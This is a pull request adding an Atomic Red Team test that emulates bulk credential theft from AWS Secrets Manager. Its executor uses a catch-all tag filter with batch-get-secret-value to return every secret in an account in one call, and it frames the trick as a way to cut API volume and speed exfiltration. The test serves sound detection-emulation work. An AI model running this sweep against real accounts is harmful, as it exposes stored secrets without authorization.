### PR TITLE
T1555.006: add AWS Secrets Manager bulk retrieval atomic (BatchGetSecretValue)

### DIFF
--- a/atomics/T1555.006/T1555.006.yaml
+++ b/atomics/T1555.006/T1555.006.yaml
@@ -58,3 +58,41 @@ atomic_tests:
       remove-item #{output_file} -force -erroraction silentlycontinue
     name: powershell
     elevation_required: true
+- name: AWS - Bulk Retrieve Secrets Manager Secrets with BatchGetSecretValue
+  auto_generated_guid: 57ffa0d7-94de-4b68-8836-897c14e83d23
+  description: |
+    Emulates bulk credential theft from AWS Secrets Manager. With secretsmanager:BatchGetSecretValue and secretsmanager:ListSecrets, an adversary retrieves many secret values in a single API call by supplying a catch all tag filter, instead of iterating GetSecretValue per secret. This lowers API call volume and speeds exfiltration. Two throwaway secrets are created so the sweep returns data, then removed during cleanup.
+    Reference: https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.secretsmanager-batch-retrieve-secrets/
+  supported_platforms:
+  - iaas:aws
+  input_arguments:
+    region:
+      description: AWS region to target
+      type: string
+      default: us-east-1
+    secret_name:
+      description: Base name for the throwaway secrets created for this test
+      type: string
+      default: atomic-red-team-T1555006
+    nonexistent_tag:
+      description: Tag key that no secret has, used to build a catch all filter that matches every secret
+      type: string
+      default: atomic-red-team-no-match
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      The aws cli must be installed and AWS credentials or a profile configured.
+    prereq_command: |
+      aws sts get-caller-identity > /dev/null 2>&1
+    get_prereq_command: |
+      echo "install the aws cli and run: aws configure"
+  executor:
+    command: |
+      aws secretsmanager create-secret --name "#{secret_name}-1" --secret-string "atomic-dummy-value-1" --region #{region} > /dev/null
+      aws secretsmanager create-secret --name "#{secret_name}-2" --secret-string "atomic-dummy-value-2" --region #{region} > /dev/null
+      aws secretsmanager batch-get-secret-value --filters "Key=tag-key,Values=!#{nonexistent_tag}" --region #{region}
+    cleanup_command: |
+      aws secretsmanager delete-secret --secret-id "#{secret_name}-1" --force-delete-without-recovery --region #{region} > /dev/null 2>&1
+      aws secretsmanager delete-secret --secret-id "#{secret_name}-2" --force-delete-without-recovery --region #{region} > /dev/null 2>&1
+    name: sh
+    elevation_required: false


### PR DESCRIPTION
Adds an AWS atomic to T1555.006, which currently only covers Azure Key Vault.
Emulates bulk secret theft: a catch-all-filter BatchGetSecretValue sweep returning all secrets in one call.
Tested on iaas:aws with Invoke-AtomicTest (check/run/cleanup); non-destructive, creates and force-deletes two throwaway secrets.
ATT&CK: T1555.006 Credentials from Password Stores: Cloud Secrets Management Stores.